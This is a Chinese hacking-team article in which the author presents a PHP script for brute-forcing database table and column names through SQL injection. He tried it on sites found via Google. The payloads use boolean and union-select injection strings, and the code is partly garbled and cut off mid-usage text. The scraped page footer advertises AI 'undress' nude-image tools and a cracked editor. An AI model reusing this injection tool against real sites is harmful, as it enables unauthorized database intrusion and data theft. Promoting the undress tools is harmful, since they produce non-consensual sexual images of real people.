do all things in php(注入利用程序编写)
文章作者:mika[EST]
信息来源:邪恶八进制信息安全团队
最近俺又迷恋上脚本了,嘿嘿~~~刚学完PHP然后又看了些PHP安全方面的文章,于是乎从google中找了几个站练习一下。
结果发现php猜表名和列名真的很费劲啊,nbsi这类的扫描工具有没有那种用字典或者暴力猜解表名和列名的功能,难不成还得自己一个一个猜啊?我很懒的:-)
突然想到自己不是刚刚学完PHP吗?为什么不学以致用呢?php不光是一个web脚本语言,它还是一个非常棒的命令行解释语言,用它写脚本好方便的哦。为了以后能够碰到这类问题省点劲俺就写了一个php脚本用来猜表和列名的。脚本写的很简单,内容如下:
echo " Universal Database tables explode exploit V0.1
";
echo " Written by Mika[EST]
";
//$keyword="Warning";
$keyword="error";
switch($argc){
case 3:
$u=" and (select count(*) from MIKA_NAME)>0";
$dic=$argv[2];
break;
case 4:
$u=" and 1=1 union select ".implode(,,range(1,$argv[2]))." from MIKA_NAME#";
$dic=$argv[3];
break;
case 5:
if($argv[2]!="-t")
exit("arguments Error");
$u=" and (select count(MIKA_NAME) from $argv[3])>0#";
$dic=$argv[4];
break;
case 6:
if($argv[2]!="-t" || $argv[4] exit("arguments Error");
if($argv[4]>=2){
$u=" and 1=1 union select ".MIKA_NAME.,.implode(,,range(2,$argv[4]))." from $argv[3]#";
}else{
$u=" and 1=1 union select MIKA_NAME from $argv[3]#";
}
$dic=$argv[5];
break;
default:
echo Usage:$argv[0]
OPTIONS: number --->to indicate column number of a table during a union query
e.g:$argv[0] [url]http://www.aaa.com/bbb.asp?ccc=56[/url] 3 mydict.txt
the url will be like:.../bbb.asp?ccc=56 and 1=2 union select 1,2,3 from admin
OPTIONS: -t

Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Hot Tools

SublimeText3 Chinese version
Chinese version, very easy to use

Zend Studio 13.0.1
Powerful PHP integrated development environment

ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment

VSCode Windows 64-bit Download
A free and powerful IDE editor launched by Microsoft

EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function
